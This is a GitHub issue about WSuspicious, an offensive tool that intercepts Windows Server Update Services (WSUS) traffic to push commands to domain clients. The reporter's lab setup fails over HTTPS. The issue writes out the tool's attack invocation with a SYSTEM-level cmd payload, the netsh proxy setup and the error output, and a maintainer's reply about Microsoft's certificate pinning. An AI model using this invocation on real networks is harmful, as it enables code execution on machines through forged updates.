Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

SSL interception does not work #6

Open
MexHigh opened this issue Aug 17, 2021 · 2 comments
Open

SSL interception does not work #6

MexHigh opened this issue Aug 17, 2021 · 2 comments

Comments

@MexHigh
Copy link

MexHigh commented Aug 17, 2021
edited
Loading

My setup:

  • Domain controller (Windows Server 2019): dc01.lsc.lab
  • Domain client (updated Windows 10)

The Client has WSUS over HTTPS configured and uses it correctly (https://dc01.lsc.lab:8531). The certificate is accepted by Microsoft Edge when accesing the IIS default page and WSUS endpoint (using a Certificate with SAN issued by the domain CA).

I'm setting the systems proxy via admin powershell with netsh winhttp set proxy 127.0.0.1:13337.

I'm executing the following command: .\WSuspicious.exe /command:" -accepteula -s -d cmd /c echo 1 > C:\hacked.txt" /autoinstall /enabletls (The attack does work, if WSUS over HTTP is configured, so all prerequisites are met.)

This is, what I get after running the command:

The WSUS Server is using HTTPS. Adding a self-signed certificate to store
Prompting user to add the certificate. Please wait.
Detected WSUS Server - dc01.lsc.lab
Listening on 'ExplicitProxyEndPoint' endpoint at Ip 127.0.0.1 and port: 13337
Hit any key to exit..

Titanium.Web.Proxy.Exceptions.ProxyConnectException: Couldn't authenticate host 'dc01.lsc.lab' with certificate 'dc01.lsc.lab'. ---> System.IO.IOException: Fehler bei Authentifizierung, da die Gegenseite den Transportstream geschlossen hat.
   bei System.Net.Security.SslState.InternalEndProcessAuthentication(LazyAsyncResult lazyResult)
   bei System.Net.Security.SslState.EndProcessAuthentication(IAsyncResult result)
   bei System.Threading.Tasks.TaskFactory`1.FromAsyncCoreLogic(IAsyncResult iar, Func`2 endFunction, Action`1 endAction, Task`1 promise, Boolean requiresSynchronization)
--- Ende der Stapelüberwachung vom vorhergehenden Ort, an dem die Ausnahme ausgelöst wurde ---
   bei System.Runtime.ExceptionServices.ExceptionDispatchInfo.Throw()
   bei System.Runtime.CompilerServices.TaskAwaiter.HandleNonSuccessAndDebuggerNotification(Task task)
   bei Titanium.Web.Proxy.ProxyServer.<handleClient>d__2.MoveNext()
   --- Ende der internen Ausnahmestapelüberwachung ---
   bei Titanium.Web.Proxy.ProxyServer.<handleClient>d__2.MoveNext()

The Windows Update GUI shows error code 0x800b0109 (displayed as "signature errors"):

image

When accessing any IIS page with the proxy activated and running, the certificate cannot be validated due to missing subject alternative name (SAN).
@MaxNad
Copy link
Member

MaxNad commented Aug 19, 2021

Microsoft implemented a certificate pinning mechanism to protect against this attack after the issue was disclosed to them.

If the WSUS certificate pinning feature is enabled, the tool is not expected to work. See https://techcommunity.microsoft.com/t5/windows-it-pro-blog/scan-changes-and-certificates-add-security-for-windows-devices/ba-p/2053668

Is this feature currently enabled in your setup ?

@MexHigh
Copy link
Author

MexHigh commented Aug 20, 2021

I thought this too, but i set the tick to not enforce it in the GPO and as i've read it in the docs, it is not enabled anyway, if there are no certificates in the corresponding certificate store.

So no, it is not enabled.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees
No one assigned
Labels
None yet
Projects
None yet
Milestone
No milestone
Development

No branches or pull requests
2 participants
@MaxNad @MexHigh